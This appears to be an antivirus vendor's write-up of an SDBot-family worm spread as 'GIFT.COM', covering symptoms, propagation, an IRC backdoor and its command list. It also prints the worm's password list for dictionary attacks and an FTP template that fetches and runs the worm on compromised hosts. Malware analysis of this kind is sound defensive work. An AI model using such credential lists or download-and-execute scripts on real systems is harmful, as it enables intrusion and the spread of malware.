Visible Symptoms
- Possible firewall alert that the file "GIFT.COM"
is attempting to bind with TCP port 6667 and function
as a backdoor or server
- Compromised systems are slow to respond due to heavy
outbound traffic on TCP port 445 with other machines
Detailed AnalysisThe virus also has the following characteristics -
- can trick users
into running it if received as a hyperlink
in a message from a known AIM or AOL contact
- has a built-in FTP daemon
- could connect to systems across a network and compromise
them by using hard-coded exploits
against the following vulnerable (if unpatched) services
-
uPnP
Workstation (tcp 139)
asn.1
- could propogate to systems that have open
shares across a local/wide area network
- may connect to the IRC server and await
commands from a malicious user
such as sending messages to
AIM/AOL contacts with a hyperlink to the infectious
file
Dictionary attack
This virus carries a short table of logon names and
passwords to try when attempting to break into computer
systems across a network. The use of a list is also
known as a "dictionary attack" method. Below
are some of the logon names and passwords the virus
will try -
admin
root
A
server
asdfgh
asdf
!@#$%^&
!@#$%^
!@#$%
!@#$
654321
123456
12345
1234
123
1
111
1
administrator
Network spreading routine
The virus will spawn a thread that functions on this
TCP port as an FTP server. The server responds with
this detail, if connected to a logon instance -
220 Reptile
welcomes you..
When exiting the server, it responds with this string
-
221 Goodbye
happy r00ting.
Next, the virus will attempt to connect with systems
on the same Class A subnet as the infected system using
TCP port 445. If a connection can be made, the virus
uses various exploits to
gain access to the system. Once access is obtained,
the virus generates an FTP script and writes it to the
system with these pseudo-instructions:
open %IP%
%TCP port%
user 1 1
get %filename%
quit
The virus then initiates FTP.EXE locally on the compromised
system to retrieve a copy of the virus from the connecting
system, and execute it.
Backdoor functionality
The virus will create a thread that functions as a backdoor,
using a high TCP port such as 6667. The virus connects
with an IRC server into these channels, in order to
receive instructions from a malicious user -
#raim5
#raim4
#raim3
#raim2
Instructions include some of the following, with key
spreader instructions highlighted in red -
dasr33deasde
dsad32gghe
testdlls
cel
version
secure
unsecure
process
kill
del
create
nickupdate
randnick
exploitftpd
sniffer
iestart
encrypt
join
part
raw
prefix
resolve
dns
aimspread
currentip
stats
banner
advscan
scanall
lsascan
ntscan
wksescan
wksoscan
flusharp
flushdns
system
r.down
r.wget
uptime
status
pnp
wksvce
WKSSVCE
WKSSVCO
WKSSVC2
WKSSVCE139
WKSSVCO139
WKSSVC2139
asn
wksvc2139
wksvce
wksvco
wksvco139
jump
Miscellaneous
Some web sites mention this threat sends messages to
other chat program applications such as Yahoo or MSN
Messenger. There was no evidence of this happening when
the virus was under scrutiny. This virus is part of
the SDBot family however due to media attention, the
virus name seems to have been predetermined by mass
appeal.
|